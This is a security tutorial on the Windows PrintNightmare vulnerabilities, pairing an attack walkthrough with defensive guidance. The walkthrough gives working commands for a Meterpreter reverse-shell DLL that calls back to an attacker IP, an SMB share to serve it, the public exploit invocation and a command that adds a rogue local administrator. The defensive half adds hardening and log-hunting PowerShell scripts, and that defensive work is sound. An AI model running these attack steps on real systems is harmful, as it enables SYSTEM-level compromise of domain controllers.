Legal & Ethical Disclaimer: This article is for education and authorized testing only. Run these techniques exclusively against systems you own or have explicit, written permission to test. Exploiting the Print Spooler on machines you do not control is illegal and can crash production services. Stay in scope.
Introduction / Overview
PrintNightmare is the umbrella name for a pair of vulnerabilities in the Windows Print Spooler service (spoolsv.exe) that allow an attacker to execute arbitrary code as NT AUTHORITY\SYSTEM. Two CVEs are involved:
- CVE-2021-1675 — originally patched in June 2021 as a local privilege escalation, later found to also enable RCE.
- CVE-2021-34527 — the remote code execution variant, assigned after researchers demonstrated the June patch was incomplete.
What makes this bug devastating is that the Print Spooler service runs as SYSTEM and is enabled by default on virtually every Windows host — including Domain Controllers. An authenticated low-privileged domain user can point a DC at a malicious driver and obtain SYSTEM on it. In this article you'll learn how the MS-RPRN/MS-PAR driver-installation path is abused, walk through a working PoC, and — just as importantly — how blue teams detect and shut it down.
How It Works / Background
Windows printer drivers are installed via the MS-RPRN (Print System Remote Protocol) and MS-PAR (Print System Asynchronous Remote Protocol) RPC interfaces. The relevant RPC call is RpcAddPrinterDriverEx, which wraps the AddPrinterDriverEx API.
Normally, installing a printer driver requires the SeLoadDriverPrivilege and administrative rights. The core flaw: the spooler failed to validate that the caller was authorized when the driver was loaded from a path the attacker controlled. By passing the APD_INSTALL_WARNED_DRIVER flag (value 0x8000), an attacker bypasses the warning/validation logic that would normally block an untrusted driver.
The attack abuses the pDriverPath and pConfigFile fields of the DRIVER_INFO_2 structure. Instead of a legitimate driver, the attacker supplies a path to a malicious DLL on an SMB share (or a local path). The spooler — running as SYSTEM — copies the "driver" into the spooler driver store and then loads the configuration DLL, executing the attacker's code in the SYSTEM context.
Because the spooler can reach out to a UNC path (\\attacker\share\evil.dll), this becomes remote: any authenticated user who can bind to the spooler RPC endpoint on a target can force it to fetch and load a DLL.
Prerequisites / Lab Setup
For the RCE/AD variant you need:
- A target running an unpatched Print Spooler (e.g., a Windows Server 2019 DC pre-July-2021 patches).
- Valid domain credentials for any low-privileged user.
- A Linux attacker box with Impacket installed.
- An SMB share to host the malicious DLL (Impacket's smbserver.py works, ideally with anonymous/guest access enabled).
Quick environment check from the attacker:
# Confirm the MS-RPRN spooler interface is reachable on the target
rpcdump.py 'DOMAIN/user:Password@10.10.10.10' | grep -i 'MS-RPRN\|spool'
A non-empty result means the Print System Remote Protocol endpoint is exposed and the host is a candidate.
Attack Walkthrough / PoC
The reference public exploit is cube0x0/CVE-2021-1675, which ships an Impacket-style script. Note: it requires a modified Impacket build (cube0x0's fork) because it implements RPC structures not present in upstream at release time.
Step 1 — Generate a malicious DLL payload
# 64-bit reverse-shell DLL via msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=10.10.14.5 LPORT=4444 \
-f dll -o evil.dll
Step 2 — Host the DLL on an SMB share
# Anonymous SMB share named "share" serving the current directory
sudo smbserver.py -smb2support share ./
The DLL is now reachable at \\10.10.14.5\share\evil.dll.
Step 3 — Start a listener
# Catch the SYSTEM shell
sudo msfconsole -q -x \
"use exploit/multi/handler; \
set payload windows/x64/meterpreter/reverse_tcp; \
set LHOST 10.10.14.5; set LPORT 4444; run"
Step 4 — Trigger the spooler
# Force the target spooler to load our DLL as SYSTEM
python3 CVE-2021-1675.py \
'DOMAIN/user:Password@10.10.10.10' \
'\\10.10.14.5\share\evil.dll'
If the host is vulnerable, the spooler fetches evil.dll, loads it as the config DLL, and you receive a Meterpreter session as NT AUTHORITY\SYSTEM.
Alternative: add a local admin (no payload needed)
Tools like the PowerShell Invoke-Nightmare (cube0x0) drop a DLL that creates a local administrator account rather than calling back:
# Run on the target (local PrivEsc variant, CVE-2021-1675)
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hax" -NewPassword "P@ssw0rd123!"
This adds hax to the local Administrators group — clean and reliable for a local privilege escalation when you already have a low-priv shell.
Verifying privilege
whoami
# nt authority\system <- success
Attack Flow Diagram

Text version: a low-privileged user calls RpcAddPrinterDriverEx pointing the config file at a malicious DLL on an SMB share; the SYSTEM-level spooler fetches and loads it, granting the attacker SYSTEM execution.
Detection & Defense (Blue Team)
PrintNightmare is loud if you know where to look, and several robust mitigations exist.
Patch first
Apply the July 2021 cumulative updates and later for CVE-2021-34527. Patching alone is necessary but historically was not sufficient — the registry settings below were required to fully close the RCE path on some builds.
Disable the spooler where it isn't needed
Domain Controllers almost never need to print. Disable the service entirely:
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
Restrict driver installation to admins
The key hardening registry value forces only administrators to install printer drivers. Under:
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint
set:
# Block non-admin driver installs and updates
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" -Force
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" -Name "NoWarningNoElevationOnInstall" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" -Name "UpdatePromptSettings" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" -Name "RestrictDriverInstallationToAdministrators" -Type DWord -Value 1
RestrictDriverInstallationToAdministrators = 1 is the single most effective control: it stops RpcAddPrinterDriverEx from accepting drivers from non-admins.
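As an added example (not code from the original article or from any of the tooling it cites), the following PowerShell audits a single host for the mitigations just described and reports each as pass/fail. The registry path, value names and expected values are the ones this article sets; the function name and the pass/fail logic are my own, and the named-pipe check relies on enumerating \\.\pipe\ through .NET's Directory.GetFiles. Run it from an elevated prompt.

```powershell
# Added example (not from the original article): audit one host for the
# PrintNightmare mitigations described above. Run from an elevated prompt.
# Registry path, value names and expected values are those the article sets;
# the function name is my own.
function Test-PrintNightmareHardening {
    [CmdletBinding()]
    param()

    $path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    # Expected policy values. An absent value counts as not hardened, because the
    # default (non-admin driver installs allowed) is the vulnerable state.
    $expected = [ordered]@{
        RestrictDriverInstallationToAdministrators = 1
        NoWarningNoElevationOnInstall              = 0
        UpdatePromptSettings                       = 0
    }

    $results = @()

    # 1. Service state. A stopped and disabled spooler removes the RPC endpoint
    #    entirely, which is the recommended state for Domain Controllers.
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $results += [pscustomobject]@{
        Check = 'Spooler service stopped and disabled'
        Value = if ($svc) { "$($svc.Status) / $($svc.StartType)" } else { 'not installed' }
        Pass  = (-not $svc) -or ($svc.Status -eq 'Stopped' -and $svc.StartType -eq 'Disabled')
    }

    # 2. Point and Print policy values. RestrictDriverInstallationToAdministrators=1
    #    is the one that stops RpcAddPrinterDriverEx accepting drivers from non-admins;
    #    the other two keep the warning/elevation prompts in place.
    $props = if (Test-Path -Path $path) { Get-ItemProperty -Path $path } else { $null }
    foreach ($name in $expected.Keys) {
        $actual = $null
        if ($props -and $props.PSObject.Properties[$name]) { $actual = $props.$name }
        $results += [pscustomobject]@{
            Check = "PointAndPrint\$name = $($expected[$name])"
            Value = if ($null -eq $actual) { 'not set' } else { $actual }
            Pass  = ($null -ne $actual) -and ([int]$actual -eq $expected[$name])
        }
    }

    # 3. Is \pipe\spoolss currently exposed? While the service runs, the pipe exists
    #    and any client that can reach SMB (TCP 445) can bind to the MS-RPRN interface.
    $pipes = [System.IO.Directory]::GetFiles('\\.\pipe\')
    $pipeExposed = [bool]($pipes | Where-Object { $_ -like '*\spoolss' })
    $results += [pscustomobject]@{
        Check = '\pipe\spoolss not exposed'
        Value = if ($pipeExposed) { 'pipe present' } else { 'pipe absent' }
        Pass  = -not $pipeExposed
    }

    return $results
}

# A host counts as mitigated when the spooler is off, or when it runs but driver
# installation is restricted to administrators (patching is still required).
$audit = Test-PrintNightmareHardening
$audit | Format-Table -AutoSize
$spoolerOff = ($audit | Where-Object Check -like 'Spooler service*').Pass
$restricted = ($audit | Where-Object Check -like '*RestrictDriverInstallationToAdministrators*').Pass
if ($spoolerOff -or $restricted) { 'RESULT: mitigated' } else { 'RESULT: NOT mitigated' }
```

The final verdict deliberately ignores the two prompt-related values: they harden Point and Print, but on their own they do not close the RpcAddPrinterDriverEx path, so a host that only sets them still reports NOT mitigated.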
Block outbound spooler-to-internet behavior
Prevent the spooler from reaching remote SMB shares it shouldn't (outbound TCP 445 from servers is rarely legitimate), and at the firewall layer restrict which hosts can reach inbound SMB on the target, since the \pipe\spoolss named pipe that exposes MS-RPRN is reached over that transport.
Detection / hunting
- Event log: Enable the Microsoft-Windows-PrintService/Operational log and watch for Event ID 808 ("The print spooler failed to load a plug-in module") and 316.
- DLLs loaded by spoolsv: Hunt for spoolsv.exe loading DLLs from C:\Windows\System32\spool\drivers\x64\3\ with suspicious or recently-written names, especially DLLs fetched over SMB.
- SMB pull from spooler: Correlate spoolsv.exe initiating outbound SMB to a workstation/attacker IP — this is highly abnormal.
- MITRE ATT&CK: Maps to T1068 (Exploitation for Privilege Escalation) and T1210 (Exploitation of Remote Services).
A Sigma-style hunt: alert when ParentImage ends with spoolsv.exe and Image is rundll32.exe, cmd.exe, or powershell.exe, and, in image-load telemetry, when spoolsv.exe itself loads an unsigned DLL. If you've locked down lateral movement, also review SMB relay defenses and Active Directory hardening basics.
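The hunt described in the bullets and the Sigma-style rule above, as an added PowerShell example (not code from the original article): it queries the local PrintService/Operational log for 808 and 316, then walks Sysmon events 1, 3 and 7 for spoolsv.exe spawning shells, opening outbound SMB, or loading an unsigned DLL from the Version-3 driver store. It assumes Sysmon is installed with a configuration that records image loads and network connections for spoolsv.exe, and that the PrintService/Operational log has been enabled; the function names are my own.

```powershell
# Added example (not from the original article): hunt the local event logs for the
# PrintNightmare indicators listed above. Assumes Sysmon is installed and logging
# event IDs 1 (process create), 3 (network connect) and 7 (image load) for
# spoolsv.exe, and that Microsoft-Windows-PrintService/Operational is enabled
# (wevtutil sl Microsoft-Windows-PrintService/Operational /e:true).
function ConvertTo-EventDataTable {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    # Flatten <EventData><Data Name="x">value</Data>... into a hashtable
    $xml = [xml]$Event.ToXml()
    $table = @{}
    foreach ($d in $xml.Event.EventData.Data) { $table[$d.Name] = $d.'#text' }
    return $table
}

function Find-PrintNightmareIndicators {
    param([int]$Hours = 24)
    $since  = (Get-Date).AddHours(-$Hours)
    $hits   = New-Object System.Collections.Generic.List[object]
    $shells = 'rundll32.exe', 'cmd.exe', 'powershell.exe'

    # 1. PrintService: 808 = plug-in (config DLL) load failure, 316 = driver added/updated
    $printEvents = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 808, 316; StartTime = $since
    } -ErrorAction SilentlyContinue
    foreach ($e in $printEvents) {
        $hits.Add([pscustomobject]@{
            Time = $e.TimeCreated; Source = 'PrintService'; Id = $e.Id
            Detail = ($e.Message -split "`n")[0]
        })
    }

    # 2. Sysmon telemetry on spoolsv.exe
    $sysmonEvents = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1, 3, 7; StartTime = $since
    } -ErrorAction SilentlyContinue
    foreach ($e in $sysmonEvents) {
        $d = ConvertTo-EventDataTable -Event $e
        $detail = $null
        switch ($e.Id) {
            1 {
                # The spooler has no business spawning shells or rundll32
                $child = [System.IO.Path]::GetFileName([string]$d.Image)
                if ($d.ParentImage -like '*\spoolsv.exe' -and $shells -contains $child) {
                    $detail = "spoolsv.exe spawned $($d.Image) $($d.CommandLine)"
                }
            }
            3 {
                # Outbound SMB from the spooler: it is fetching a "driver" from a remote share
                if ($d.Image -like '*\spoolsv.exe' -and $d.Initiated -eq 'true' -and $d.DestinationPort -eq '445') {
                    $detail = "spoolsv.exe opened SMB to $($d.DestinationIp)"
                }
            }
            7 {
                # Unsigned DLL loaded from the Version-3 driver store
                if ($d.Image -like '*\spoolsv.exe' -and
                    $d.ImageLoaded -like '*\spool\drivers\x64\3\*' -and
                    $d.Signed -ne 'true') {
                    $detail = "spoolsv.exe loaded unsigned $($d.ImageLoaded) (hashes: $($d.Hashes))"
                }
            }
        }
        if ($detail) {
            $hits.Add([pscustomobject]@{ Time = $e.TimeCreated; Source = 'Sysmon'; Id = $e.Id; Detail = $detail })
        }
    }
    return $hits | Sort-Object Time
}

Find-PrintNightmareIndicators -Hours 24 | Format-Table -AutoSize -Wrap
```

The three Sysmon checks are intentionally independent: a 316 with a freshly written unsigned DLL in drivers\x64\3 is strong on its own, but a spooler-initiated SMB connection shortly before it is what turns a local-privesc-looking event into the remote variant, so keep the timeline ordering when triaging.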
Conclusion
PrintNightmare remains one of the cleanest paths from a single set of domain credentials to SYSTEM on a Domain Controller, precisely because the Print Spooler runs as SYSTEM and trusts attacker-supplied driver paths via AddPrinterDriverEx. The fix is layered: patch, disable the spooler on servers that don't print, and set RestrictDriverInstallationToAdministrators. For red teamers, it's a reliable escalation primitive worth checking on every engagement; for defenders, it's a reminder that legacy services running as SYSTEM are prime targets. If your engagement also touched credential theft, see our Kerberoasting guide for the next step in the kill chain.
References
- MITRE ATT&CK — T1068: https://attack.mitre.org/techniques/T1068/
- MITRE ATT&CK — T1210: https://attack.mitre.org/techniques/T1210/
- Microsoft Security Advisory CVE-2021-34527: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
- NVD — CVE-2021-1675: https://nvd.nist.gov/vuln/detail/CVE-2021-1675
- HackTricks — Print Spooler / PrintNightmare: https://book.hacktricks.xyz/
- cube0x0/CVE-2021-1675 PoC: https://github.com/cube0x0/CVE-2021-1675
- Impacket: https://github.com/fortra/impacket